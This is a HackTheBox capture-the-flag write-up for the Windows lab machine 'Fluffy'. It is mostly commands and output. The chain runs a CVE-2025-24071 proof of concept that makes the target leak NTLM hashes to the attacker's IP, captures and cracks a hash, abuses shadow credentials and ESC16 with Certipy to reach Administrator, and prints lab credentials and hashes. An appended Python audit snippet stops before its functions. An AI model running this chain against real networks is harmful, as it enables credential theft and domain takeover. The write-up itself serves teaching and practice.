Fluffy
Fluffy is a Windows machine that involves abusing a writable SMB share, capturing NTLM hashes, and using shadow credentials with Certipy. It focuses on Active Directory misconfigurations, including certificate template abuse, to impersonate high-privileged users like Administrator.
# Fluffy - Windows - Easy
## Port Scanning
```shell
rustscan -a 10.10.11.69 -- -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports like it's my full-time job. Wait, it is.
[~] The config file is expected to be at "/home/oscarmine/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.11.69:53
Open 10.10.11.69:88
Open 10.10.11.69:139
Open 10.10.11.69:389
Open 10.10.11.69:445
Open 10.10.11.69:464
Open 10.10.11.69:593
Open 10.10.11.69:636
Open 10.10.11.69:3269
Open 10.10.11.69:3268
Open 10.10.11.69:5985
Open 10.10.11.69:9389
Open 10.10.11.69:49667
Open 10.10.11.69:49729
Open 10.10.11.69:49712
Open 10.10.11.69:49693
Open 10.10.11.69:49690
Open 10.10.11.69:49689
Open 10.10.11.69:49764
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sV" on ip 10.10.11.69
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-21 18:15 +05
NSE: Loaded 47 scripts for scanning.
Initiating Ping Scan at 18:15
Scanning 10.10.11.69 [4 ports]
Completed Ping Scan at 18:15, 0.14s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 18:15
Scanning fluffy.htb (10.10.11.69) [19 ports]
Discovered open port 445/tcp on 10.10.11.69
Discovered open port 53/tcp on 10.10.11.69
Discovered open port 49693/tcp on 10.10.11.69
Discovered open port 139/tcp on 10.10.11.69
Discovered open port 49667/tcp on 10.10.11.69
Discovered open port 49764/tcp on 10.10.11.69
Discovered open port 636/tcp on 10.10.11.69
Discovered open port 9389/tcp on 10.10.11.69
Discovered open port 3269/tcp on 10.10.11.69
Discovered open port 389/tcp on 10.10.11.69
Discovered open port 49712/tcp on 10.10.11.69
Discovered open port 3268/tcp on 10.10.11.69
Discovered open port 88/tcp on 10.10.11.69
Discovered open port 5985/tcp on 10.10.11.69
Discovered open port 49729/tcp on 10.10.11.69
Discovered open port 464/tcp on 10.10.11.69
Discovered open port 49689/tcp on 10.10.11.69
Discovered open port 593/tcp on 10.10.11.69
Discovered open port 49690/tcp on 10.10.11.69
Completed SYN Stealth Scan at 18:15, 0.24s elapsed (19 total ports)
Initiating Service scan at 18:15
Scanning 19 services on fluffy.htb (10.10.11.69)
Completed Service scan at 18:16, 56.35s elapsed (19 services on 1 host)
NSE: Script scanning 10.10.11.69.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:16
Completed NSE at 18:16, 0.51s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:16
Completed NSE at 18:16, 0.41s elapsed
Nmap scan report for fluffy.htb (10.10.11.69)
Host is up, received echo-reply ttl 127 (0.11s latency).
Scanned at 2025-07-21 18:15:40 +05 for 58s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-07-21 20:15:47Z)
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49689/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49693/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49712/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49729/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49764/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.97 seconds
Raw packets sent: 23 (988B) | Rcvd: 20 (864B)
```
## SMB Enumeration
```shell
smbmap -H fluffy.htb -u 'j.fleischman' -p 'J0elTHEM4n1990!'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.11.69:445 Name: fluffy.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
IT READ, WRITE
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
[*] Closed 1 connections
```
## Smbclient IT share access
```shell
smbclient //fluffy.htb/IT -U j.fleischman%J0elTHEM4n1990!
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jul 22 01:21:11 2025
.. D 0 Tue Jul 22 01:21:11 2025
.DS_Store AH 8196 Tue Jul 22 01:21:20 2025
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 20:08:44 2025
Everything-1.4.1.1026.x64 2 D 0 Tue Jul 22 01:21:10 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 20:04:05 2025
KeePass-2.58 D 0 Fri Apr 18 20:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 20:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 19:31:07 2025
5842943 blocks of size 4096. 2244939 blocks available
smb: \>
```
### Download Upgrade_Notice.pdf and read it; it references CVE-2025-24071
## Let's use this exploit
### CVE: CVE-2025-24071
### Url: https://github.com/0x6rss/CVE-2025-24071_PoC
```shell
┌──(oscarmine㉿FuckingKali)-[~/…/htb/machines/fluffy/CVE-2025-24071_PoC]
└─$ ls
README.md poc.py
┌──(oscarmine㉿FuckingKali)-[~/…/htb/machines/fluffy/CVE-2025-24071_PoC]
└─$ python3 poc.py
Enter your file name: exploit
Enter IP (EX: 192.168.1.162): 10.10.14.35
completed
┌──(oscarmine㉿FuckingKali)-[~/…/htb/machines/fluffy/CVE-2025-24071_PoC]
└─$ ls
README.md exploit.zip poc.py
```
## Uploading our exploit
```shell
┌──(oscarmine㉿FuckingKali)-[~/…/htb/machines/fluffy/CVE-2025-24071_PoC]
└─$ smbclient //fluffy.htb/IT -U j.fleischman%J0elTHEM4n1990!
Try "help" to get a list of possible commands.
smb: \> put exploit.zip
putting file exploit.zip as \exploit.zip (0.9 kb/s) (average 0.9 kb/s)
smb: \> ls
. D 0 Tue Jul 22 01:46:10 2025
.. D 0 Tue Jul 22 01:46:10 2025
.DS_Store AH 8196 Tue Jul 22 01:21:20 2025
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 20:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 20:04:05 2025
exploit.zip A 323 Tue Jul 22 01:46:10 2025
KeePass-2.58 D 0 Fri Apr 18 20:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 20:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 19:31:07 2025
5842943 blocks of size 4096. 2245330 blocks available
smb: \>
```
## Use Responder to receive the victim's hash; if no hash arrives after uploading exploit.zip, put it on the SMB share again
```shell
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ sudo responder -I tun0 -wvF
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.6.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [ON]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.35]
Responder IPv6 [dead:beef:2::1021]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-00ZT3QNQWRK]
Responder Domain Name [1DEF.LOCAL]
Responder DCE-RPC Port [49536]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : <REDACTED HASH>
```
## Cracking the hash
```shell
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<REDACTED PASSWORD> (p.agila)
1g 0:00:00:02 DONE (2025-07-21 19:00) 0.4366g/s 1972Kp/s 1972Kc/s 1972KC/s proquis..prom pics
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
```
## bloodhound-python
```shell
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ bloodhound-python -u 'p.agila' -p '<REDACTED PASSWORD>' -d fluffy.htb -ns 10.10.11.69 -c all --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.fluffy.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
INFO: Done in 00M 24S
INFO: Compressing output into 20250721190416_bloodhound.zip
```
## Add p.agila to group
```shell
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ bloodyAD --host '10.10.11.69' -d 'dc01.fluffy.htb' -u 'p.agila' -p '<REDACTED PASSWORD>' add groupMember 'SERVICE ACCOUNTS' p.agila
[+] p.agila added to SERVICE ACCOUNTS
```
## Members of SERVICE ACCOUNTS have GenericWrite over the service accounts (ca_svc, ldap_svc, winrm_svc), so shadow credentials (KeyCredentials) can be added to them
```shell
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ certipy-ad shadow auto -u 'p.agila@fluffy.htb' -p '<REDACTED PASSWORD>' -account 'WINRM_SVC' -dc-ip '10.10.11.69'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '1c6a51e2-3710-dfe6-ca6e-6aece7bc0ed9'
[*] Adding Key Credential with device ID '1c6a51e2-3710-dfe6-ca6e-6aece7bc0ed9' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '1c6a51e2-3710-dfe6-ca6e-6aece7bc0ed9' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'winrm_svc@fluffy.htb'
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[-] Use -debug to print a stacktrace
[-] See the wiki for more information
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': None
```
### We got a clock-skew error, so we sync our clock with the target's
```shell
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ sudo ntpdate 10.10.11.69
2025-07-22 03:02:44.972501 (+0500) +25200.237054 +/- 0.059889 10.10.11.69 s1 no-leap
CLOCK: time stepped by 25200.237054
```
### Now try again
```shell
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ certipy-ad shadow auto -u 'p.agila@fluffy.htb' -p '<REDACTED PASSWORD>' -account 'WINRM_SVC' -dc-ip '10.10.11.69'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The resolution lifetime expired after 5.409 seconds: Server Do53:10.10.11.69@53 answered The DNS operation timed out.; Server Do53:10.10.11.69@53 answered The DNS operation timed out.; Server Do53:10.10.11.69@53 answered The DNS operation timed out.
[!] Use -debug to print a stacktrace
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'f4ec37c0-c6ed-3c1f-408b-19279eb50f5f'
[*] Adding Key Credential with device ID 'f4ec37c0-c6ed-3c1f-408b-19279eb50f5f' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID 'f4ec37c0-c6ed-3c1f-408b-19279eb50f5f' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'winrm_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'winrm_svc.ccache'
[*] Wrote credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': <REDACTED WINRM_SVC HASH>
```
## Connect with Evil-WinRM
```shell
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ evil-winrm -i 10.10.11.69 -u WINRM_SVC -H <REDACTED WINRM_SVC HASH>
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents>
```
## Get the user.txt
```shell
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> dir
Directory: C:\Users\winrm_svc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/21/2025 4:02 AM 34 user.txt
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> type user.txt
```
## There doesn't seem to be anything special about winrm_svc, so we move on to ca_svc (its NT hash comes from the same shadow-credentials step, shown further down under Step 3)
```shell
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ certipy-ad find -vulnerable -u CA_SVC -hashes ":ca0f4f9e9eb8a092addf53bb03fc98c8" -dc-ip 10.10.11.69
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20250721203445_Certipy.txt'
[*] Wrote text output to '20250721203445_Certipy.txt'
[*] Saving JSON output to '20250721203445_Certipy.json'
[*] Wrote JSON output to '20250721203445_Certipy.json'
```
## No templates were found
```shell
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ cat 20250721203445_Certipy.txt
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : FLUFFY.HTB\Administrators
Access Rights
ManageCertificates : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
ManageCa : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
Enroll : FLUFFY.HTB\Cert Publishers
Certificate Templates : [!] Could not find any certificate templates
```
## Maybe the certipy-ad version is too old, so update it
```shell
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ pip3 install --upgrade certipy-ad --break-system-packages
Defaulting to user installation because normal site-packages is not writeable
Requirement already satisfied: certipy-ad in /usr/lib/python3/dist-packages (5.0.2)
Collecting certipy-ad
Downloading certipy_ad-5.0.3-py3-none-any.whl.metadata (4.7 kB)
<SNIP>
Successfully installed certipy-ad-5.0.3 cryptography-42.0.8 impacket-0.12.0 pycryptodome-3.22.0 pyopenssl-24.0.0
```
## Try Again
```shell
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ certipy find -username ca_svc -hashes :ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.10.11.69 -vulnerable
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20250721204434_Certipy.txt'
[*] Wrote text output to '20250721204434_Certipy.txt'
[*] Saving JSON output to '20250721204434_Certipy.json'
[*] Wrote JSON output to '20250721204434_Certipy.json'
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ cat 20250721204434_Certipy.txt
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Disabled Extensions : 1.3.6.1.4.1.311.25.2
Permissions
Owner : FLUFFY.HTB\Administrators
Access Rights
ManageCa : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
ManageCertificates : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
Enroll : FLUFFY.HTB\Cert Publishers
[!] Vulnerabilities
ESC16 : Security Extension is disabled.
[*] Remarks
ESC16 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates : [!] Could not find any certificate templates
```
There is an ESC16 vulnerability! Refer to the following link:
https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc16-security-extension-disabled-on-ca-globally
## Step 1: Read the original UPN of the victim account (optional - for recovery)
```shell
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ certipy account -u 'p.agila@fluffy.htb' -p '<REDACTED PASSWORD>' -dc-ip '10.10.11.69' -user 'ca_svc' read
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'ca_svc':
cn : certificate authority service
distinguishedName : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
name : certificate authority service
objectSid : S-1-5-21-497550768-2797716248-2627064577-1103
sAMAccountName : ca_svc
servicePrincipalName : ADCS/ca.fluffy.htb
userPrincipalName : Administrator
userAccountControl : 66048
whenCreated : 2025-04-17T16:07:50+00:00
whenChanged : 2025-07-21T22:43:46+00:00
```
## Step 2: Update the victim account’s UPN to the target admin’s sAMAccountName
```shell
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ certipy account -u 'p.agila@fluffy.htb' -p '<REDACTED PASSWORD>' -dc-ip '10.10.11.69' -upn 'administrator' -user 'ca_svc' update
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : administrator
[*] Successfully updated 'ca_svc'
```
## Step 3: Request a certificate issued as the "victim" user from any suitable client authentication template (e.g., "User") on the CA vulnerable to ESC16
```shell
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ sudo ntpdate 10.10.11.69
2025-07-22 03:54:42.250487 (+0500) +25200.677259 +/- 0.047417 10.10.11.69 s1 no-leap
CLOCK: time stepped by 25200.677259
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ certipy shadow -u 'p.agila@fluffy.htb' -p '<REDACTED PASSWORD>' -dc-ip '10.10.11.69' -account 'ca_svc' auto
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The resolution lifetime expired after 5.405 seconds: Server Do53:10.10.11.69@53 answered The DNS operation timed out.; Server Do53:10.10.11.69@53 answered The DNS operation timed out.; Server Do53:10.10.11.69@53 answered The DNS operation timed out.
[!] Use -debug to print a stacktrace
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'b5a02676ce1f4e7db116717183200296'
[*] Adding Key Credential with device ID 'b5a02676ce1f4e7db116717183200296' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'b5a02676ce1f4e7db116717183200296' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ export KRB5CCNAME=ca_svc.ccache
```
## Then request a certificate
```shell
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ sudo ntpdate 10.10.11.69
2025-07-22 03:59:16.331563 (+0500) +25200.676839 +/- 0.047240 10.10.11.69 s1 no-leap
CLOCK: time stepped by 25200.676839
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ certipy req -k -dc-ip 10.10.11.69 -dc-host dc01.fluffy.htb -target DC01.FLUFFY.HTB -ca fluffy-DC01-CA -template User
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 20
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
```
## Step 4: Restore the UPN of the "victim" account
```shell
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ certipy account -u 'p.agila@fluffy.htb' -p '<REDACTED PASSWORD>' -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'
```
## Step 5: Authenticate as the target administrator
```shell
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ sudo ntpdate 10.10.11.69
2025-07-22 04:02:04.191146 (+0500) +25200.670874 +/- 0.050795 10.10.11.69 s1 no-leap
CLOCK: time stepped by 25200.670874
┌──(oscarmine㉿FuckingKali)-[~/Documents/htb/machines/fluffy]
└─$ certipy auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:<REDACTED ADMINISTRATOR HASH>
```
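As an added defender-side example (not part of the original writeup), here is a small Python audit over the two Certipy outputs shown above: the `find` text output, where the OID 1.3.6.1.4.1.311.25.2 under "Disabled Extensions" is the ESC16 condition, and the `account read` output, where a userPrincipalName that does not match the sAMAccountName (ca_svc carrying "Administrator") is exactly the footprint that Step 2 leaves and Step 4 removes. The sample inputs are constructed, abbreviated copies of the page's output, and `PRIVILEGED_NAMES` is an assumed list to be filled with your own tier-0 accounts.

```python
"""Audit helpers for the two ESC16 indicators visible in this writeup:
1) Certipy 'find' text output listing the SID security extension OID
   (1.3.6.1.4.1.311.25.2, szOID_NTDS_CA_SECURITY_EXT) under 'Disabled Extensions';
2) Certipy 'account ... read' output where userPrincipalName does not match
   sAMAccountName (e.g. ca_svc carrying the UPN 'Administrator').
"""
import re
from typing import Dict, List

# OID of the SID security extension that ESC16 disables CA-wide.
NTDS_CA_SECURITY_EXT_OID = "1.3.6.1.4.1.311.25.2"

# Assumed list of privileged account names; extend for your environment.
PRIVILEGED_NAMES = {"administrator"}

# Constructed sample: abbreviated copy of the certipy 'find' text output above.
FIND_OUTPUT = """\
Certificate Authorities
  0
    CA Name                             : fluffy-DC01-CA
    DNS Name                            : DC01.fluffy.htb
    User Specified SAN                  : Disabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
    Permissions
      Owner                             : FLUFFY.HTB\\Administrators
"""

# Constructed sample: abbreviated copy of the certipy 'account ... read' output above.
ACCOUNT_OUTPUT = """\
[*] Reading attributes for 'ca_svc':
    cn                                  : certificate authority service
    sAMAccountName                      : ca_svc
    servicePrincipalName                : ADCS/ca.fluffy.htb
    userPrincipalName                   : Administrator
    userAccountControl                  : 66048
"""

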